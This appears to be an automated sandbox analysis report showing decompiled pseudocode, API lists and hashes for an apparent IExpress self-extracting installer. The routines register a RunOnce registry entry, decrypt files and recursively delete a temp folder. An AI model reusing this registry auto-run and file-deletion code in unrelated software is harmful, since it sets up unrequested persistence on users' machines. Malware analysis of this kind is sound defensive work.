                                                                                                                                                                                                        0x002130ad
                                                                                                                                                                                                        0x002130af
                                                                                                                                                                                                        0x002130af
                                                                                                                                                                                                        0x002130ad
                                                                                                                                                                                                        0x002130b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021308b
                                                                                                                                                                                                        0x0021308b
                                                                                                                                                                                                        0x00213091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213093
                                                                                                                                                                                                        0x00213098
                                                                                                                                                                                                        0x0021309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021309c
                                                                                                                                                                                                        0x00213089
                                                                                                                                                                                                        0x0021305c
                                                                                                                                                                                                        0x00213061
                                                                                                                                                                                                        0x00213063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213063
                                                                                                                                                                                                        0x0021302b
                                                                                                                                                                                                        0x00213032
                                                                                                                                                                                                        0x0021303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021303c
                                                                                                                                                                                                        0x00213006
                                                                                                                                                                                                        0x0021300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021300e
                                                                                                                                                                                                        0x00213015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213015
                                                                                                                                                                                                        0x00212f80
                                                                                                                                                                                                        0x00212f3f
                                                                                                                                                                                                        0x00212f46
                                                                                                                                                                                                        0x00212f5f
                                                                                                                                                                                                        0x00212f5f
                                                                                                                                                                                                        0x00212f64
                                                                                                                                                                                                        0x00212f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f66
                                                                                                                                                                                                        0x00212f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f55
                                                                                                                                                                                                        0x00212f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00212F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00212FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00212FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00212FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00212FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021301C
                                                                                                                                                                                                          • Part of subcall function 002151E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00212F4D,?,00000002,00000000), ref: 00215201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-4070797333
                                                                                                                                                                                                        • Opcode ID: 8f50ac37dfe87e0a83d4abffe0d476bf4b115f93586193a1f53c7c5c54145581
                                                                                                                                                                                                        • Instruction ID: e426870538efdaed9eb8d400fb3ada8419a80368c64d99463bd5cc49c5bc5c57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f50ac37dfe87e0a83d4abffe0d476bf4b115f93586193a1f53c7c5c54145581
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7417E31A202169BDB30EF71AC8D7EA32EA9B78750F104065E945C2591EF748EE48A61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00212390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00216CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00211680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E002116B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00211680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E002116B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E002116B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E0021658A( &_v280, 0x104, 0x211140);
                                                                                                                                                                                                        								E00212390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00218A3A,002111F4,00218A3A,00000000,?,?), ref: 002123F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,002111F8), ref: 00212427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,002111FC), ref: 0021243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00212495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002124A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 002124AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 002124BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00218A3A), ref: 002124C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: cadb99bbc3956a6af0b2ca80f8a9139379c9145de73a3f7055a8cf283210be9a
                                                                                                                                                                                                        • Instruction ID: 03823a75d69d222820f7c5b7d495eb612c8f16ce144b8ee216458a4055856016
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cadb99bbc3956a6af0b2ca80f8a9139379c9145de73a3f7055a8cf283210be9a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7131A631214745EBC320DF64DC8DAEB73ECABE5305F04492DB55982190EF3499ADCB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00212BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0x21a288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0x219124 = 0;
                                                                                                                                                                                                        				if(E00212CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00212F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E002152B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0x218a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0x219a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00211F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0x218588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0x219124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00216BB0,00210000,00000000,00000002,0000000A), ref: 00212C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00216BB0,00210000,00000000,00000002,0000000A), ref: 00212C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00212C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00216BB0,00210000,00000000,00000002,0000000A), ref: 00212C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 86e362c6251cc61783fef7eae130117d3a5f35cb54fce8e8a2dd050ef42f4c65
                                                                                                                                                                                                        • Instruction ID: cdfd129ee01ba4b3993bb516c23fbe0a1ff49b81e4b4594e9b3113b173c99985
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86e362c6251cc61783fef7eae130117d3a5f35cb54fce8e8a2dd050ef42f4c65
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E119431621216EBD7206F75BC9DAEA37DD9B78750B064026BA04D3250DE30DCF98A91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00216F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00216EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00216f45
                                                                                                                                                                                                        0x00216f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00216F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: 754b1015d513fd0f1047f5a771b81ecab3aa5dfa3971aa1b41e66296c04cca6b
                                                                                                                                                                                                        • Instruction ID: 833d1af2110021ee179f98b3dc40422cb1ca26a9cc62ba3fc3be2bae093fe737
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 754b1015d513fd0f1047f5a771b81ecab3aa5dfa3971aa1b41e66296c04cca6b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 059002642621005B96101BB0AD1D8A979D15A6E602F8195A0A015C4494DF6040909512
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E0021202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E00216CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E0021171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E0021658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0x219a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0x2191e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0x2191e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x2191e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0x218580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        							E0021171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E002144B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E0021658A( &_v268, 0x104, 0x211140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0x218530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002120d3
                                                                                                                                                                                                        0x002120da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002120da
                                                                                                                                                                                                        0x002120e2
                                                                                                                                                                                                        0x00212103
                                                                                                                                                                                                        0x0021210e
                                                                                                                                                                                                        0x00212116
                                                                                                                                                                                                        0x00212122
                                                                                                                                                                                                        0x00212128
                                                                                                                                                                                                        0x0021212c
                                                                                                                                                                                                        0x00212179
                                                                                                                                                                                                        0x00212194
                                                                                                                                                                                                        0x002121de
                                                                                                                                                                                                        0x002121e4
                                                                                                                                                                                                        0x00212256
                                                                                                                                                                                                        0x00212256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212256
                                                                                                                                                                                                        0x00212196
                                                                                                                                                                                                        0x00212196
                                                                                                                                                                                                        0x0021219c
                                                                                                                                                                                                        0x0021219f
                                                                                                                                                                                                        0x0021219f
                                                                                                                                                                                                        0x002121a1
                                                                                                                                                                                                        0x002121a2
                                                                                                                                                                                                        0x002121a6
                                                                                                                                                                                                        0x002121a8
                                                                                                                                                                                                        0x002121b0
                                                                                                                                                                                                        0x002121b0
                                                                                                                                                                                                        0x002121b2
                                                                                                                                                                                                        0x002121b3
                                                                                                                                                                                                        0x002121bc
                                                                                                                                                                                                        0x002121c7
                                                                                                                                                                                                        0x002121cb
                                                                                                                                                                                                        0x002121f1
                                                                                                                                                                                                        0x002121f6
                                                                                                                                                                                                        0x002121fd
                                                                                                                                                                                                        0x002121ff
                                                                                                                                                                                                        0x002121ff
                                                                                                                                                                                                        0x00212204
                                                                                                                                                                                                        0x00212213
                                                                                                                                                                                                        0x00212218
                                                                                                                                                                                                        0x0021221d
                                                                                                                                                                                                        0x0021221d
                                                                                                                                                                                                        0x00212220
                                                                                                                                                                                                        0x00212220
                                                                                                                                                                                                        0x00212222
                                                                                                                                                                                                        0x00212223
                                                                                                                                                                                                        0x00212229
                                                                                                                                                                                                        0x0021223d
                                                                                                                                                                                                        0x00212249
                                                                                                                                                                                                        0x00212250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212250
                                                                                                                                                                                                        0x002121d2
                                                                                                                                                                                                        0x002121d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002121d9
                                                                                                                                                                                                        0x0021213a
                                                                                                                                                                                                        0x00212141
                                                                                                                                                                                                        0x00212144
                                                                                                                                                                                                        0x0021214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212163
                                                                                                                                                                                                        0x00212172
                                                                                                                                                                                                        0x00212172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212163
                                                                                                                                                                                                        0x002120ea
                                                                                                                                                                                                        0x002120f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212050
                                                                                                                                                                                                        • memset.MSVCRT ref: 0021205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0021208C
                                                                                                                                                                                                          • Part of subcall function 0021171E: _vsnprintf.MSVCRT ref: 00211750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002120C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002120EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00212103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212122
